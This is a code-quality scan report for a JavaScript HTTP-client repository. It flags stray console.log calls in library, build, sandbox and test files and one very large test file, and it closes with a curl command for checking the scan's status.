low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — gulpfile.js:9
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — lib/utils.js:399
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak. Of the files flagged by this rule, only lib/utils.js ships in the published package; the others are examples, build scripts, a sandbox and tests, where console output is the intended interface, so this is the one entry worth checking.
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — sandbox/client.js:10
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — sandbox/server.js:81
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — scripts/axios-build-instance.js:6
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — tests/module/cjs/tests/helpers/cjs-is-cancel-typing.ts:11
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — tests/module/cjs/tests/helpers/cjs-typing.ts:51
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — tests/module/esm/tests/helpers/esm-index.ts:73
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — tests/setup/server.js:68
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — tests/unit/adapters/fetch.test.js:317
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer quality complexity conf 1.00 Very large file: tests/unit/adapters/http.test.js (6178 lines)
Files with >800 lines often hide complexity hotspots and discourage tests.
complexity
API access

This page is publicly accessible at: https://repobility.com/scan/638bbbc9-da12-4b15-a037-c1489534a330/

To check status programmatically (no auth required):

curl -s https://repobility.com/api/v1/public/scan/638bbbc9-da12-4b15-a037-c1489534a330/

Important — please don't re-submit the same URL repeatedly. The submission endpoint is idempotent: re-submitting the same git URL returns this same scan_token, not a new one. To re-scan this repo, sign up free and use the dashboard.